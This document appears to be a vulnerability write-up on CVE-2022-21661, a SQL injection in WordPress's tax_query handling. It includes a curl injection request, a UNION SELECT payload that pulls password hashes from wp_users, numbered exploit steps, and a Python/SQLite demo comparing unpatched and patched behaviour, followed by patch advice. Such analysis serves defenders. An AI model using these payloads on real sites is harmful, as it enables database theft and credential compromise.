How CVE-2022-21661 works
CVE-2022-21661 is a SQL injection in the WordPress WP_Query class, specifically in the taxonomy part of the post query that WP_Tax_Query builds. When a tax_query clause uses 'field' => 'term_taxonomy_id', the values in 'terms' were imploded straight into the SQL IN (...) list without being cast to integers, so whatever reached 'terms' became part of the query. WordPress core never reads tax_query from HTTP parameters, so the flaw is only reachable through a plugin or theme that copies request data into a WP_Query argument in that shape; where such code exists on a public page, the injection is reachable from the site frontend without any authentication. Because the clause lands inside a SELECT, the attacker can close the IN list and append a UNION SELECT that reads other tables, including the password hashes and user details in wp_users.
Platform: WordPress
Affected versions: 5.8 to 5.8.2 (fixed in 5.8.3; the fix was also backported to older maintained branches)
Vulnerability: SQL Injection (CWE-89)
Severity: High (NVD CVSS v3.1 base score 7.5)
Date: 2022-01-10
Patch: Available (WordPress 5.8.3)
What Undercode Say:
The request below only does anything against a plugin or theme that forwards these parameters into a WP_Query tax_query argument; stock WordPress ignores them. The array index 0 is assumed here (the original index was lost in extraction), the field must be term_taxonomy_id for the unsanitized path to be hit, and the taxonomy name is category (cat is only the query variable).
`curl -s "http://vulnerable-site.com/?cat=1" --data 'tax_query[0][taxonomy]=category&tax_query[0][field]=term_taxonomy_id&tax_query[0][terms]=1) OR 1=1-- -'`
The tax clause ends up inside $where of the final post query; wrapping an already-interpolated string in wpdb::prepare(), as in the fragment below (the ellipsis is from the original page), provides no protection because the values are no longer placeholders:
`wpdb::prepare( "SELECT … WHERE $where $orderby $limits" );`
The read primitive: close the IN list and the subquery, then union the outer SELECT with wp_users (the comment marker is two hyphens; it was rendered as a dash on the original page):
`UNION SELECT user_login, user_pass FROM wp_users-- -`
How Exploit:
Find a plugin or theme that passes request input into a tax_query with field set to term_taxonomy_id, and craft an HTTP request to that page.
Supply terms that close the IN (...) list and append a UNION SELECT with the same number of columns as the post query.
Read the unioned rows out of the page output to exfiltrate database contents.
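The mechanism described above and the three exploit steps, as an added example that is not code from the original page or from WordPress: a small Python model of the term_taxonomy_id clause that WP_Tax_Query builds, run against an in-memory SQLite stand-in for the WordPress tables. The schema, the post and user rows and the password hash are constructed for the demo; php_intval approximates PHP's intval(), and cast_to_int=True reproduces the effect of the 5.8.3 fix (integer-casting the terms) rather than its exact code.

```python
import re
import sqlite3

# Constructed stand-in for a WordPress database (assumption: only the columns the
# demo needs, SQLite instead of MySQL; the password hash is a made-up placeholder).
SAMPLE_SCHEMA = """
CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_title TEXT);
CREATE TABLE wp_term_relationships (object_id INTEGER, term_taxonomy_id INTEGER);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_posts VALUES (1, 'Hello world'), (2, 'Second post');
INSERT INTO wp_term_relationships VALUES (1, 1), (2, 2);
INSERT INTO wp_users VALUES (1, 'admin', '$P$B-constructed-placeholder-hash');
"""

# Payload in the shape the page describes: close the IN (...) list and the
# subquery, then UNION the outer two-column post SELECT with wp_users.
PAYLOAD = "1)) UNION SELECT user_login, user_pass FROM wp_users-- -"


def php_intval(value):
    """Approximate PHP's intval(): leading integer prefix of the string, else 0."""
    m = re.match(r"\s*[+-]?\d+", str(value))
    return int(m.group()) if m else 0


def tax_clause(terms, cast_to_int):
    """Build the WHERE fragment the way WP_Tax_Query does for field=term_taxonomy_id:
    the term list is imploded into an IN (...) list inside a subquery on
    wp_term_relationships. cast_to_int=False is the pre-5.8.3 behaviour;
    cast_to_int=True has the effect of the fix (every term becomes an integer)."""
    if cast_to_int:
        terms = [php_intval(t) for t in terms]
    term_list = ",".join(str(t) for t in terms)
    return (
        "wp_posts.ID IN ( SELECT object_id FROM wp_term_relationships "
        f"WHERE term_taxonomy_id IN ({term_list}) )"
    )


def build_post_query(terms, cast_to_int):
    """The outer post query; the tax clause is string-concatenated into its WHERE."""
    return (
        "SELECT wp_posts.ID, wp_posts.post_title FROM wp_posts WHERE "
        + tax_clause(terms, cast_to_int)
    )


def run_query(terms, cast_to_int):
    """Execute the assembled query against a fresh copy of the sample database."""
    db = sqlite3.connect(":memory:")
    try:
        db.executescript(SAMPLE_SCHEMA)
        return db.execute(build_post_query(terms, cast_to_int)).fetchall()
    finally:
        db.close()


if __name__ == "__main__":
    # Benign term: only the post in term_taxonomy_id 1 comes back.
    print("benign:  ", run_query(["1"], cast_to_int=False))
    # Unsanitized terms: the UNION row with the admin login and hash is in the result.
    print("injected:", run_query([PAYLOAD], cast_to_int=False))
    # With the integer cast the payload collapses to the term 1 and nothing leaks.
    print("patched: ", run_query([PAYLOAD], cast_to_int=True))
```

The query text that build_post_query returns for PAYLOAD with cast_to_int=False is the thing to look at: the attacker-controlled text sits where a plugin author expected an integer list, and any MySQL-side quoting is irrelevant because no quotes are involved. The only robust fix in plugin code is to cast the terms before they reach WP_Query, which is exactly what the core patch does for everyone.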
Protection from this CVE
Update WordPress to 5.8.3 or later immediately (sites on older branches should take the backported security release for their branch).
Audit plugins and themes that build WP_Query arguments from request input: cast tax_query terms to integers before passing them on, and never place unsanitized values in a term_taxonomy_id clause.
Use a Web Application Firewall as a stopgap; it does not replace the patch, since the injection point carries no quotes and is easy to vary.
Impact:
Unauthenticated data disclosure on sites whose plugins or themes expose the vulnerable WP_Query path.
Extraction of password hashes and other user data from wp_users.
Read access to any table the WordPress database user can select from (the injection lands in a SELECT, so it is a read primitive rather than arbitrary write access).
Sources:
Reported By: nvd.nist.gov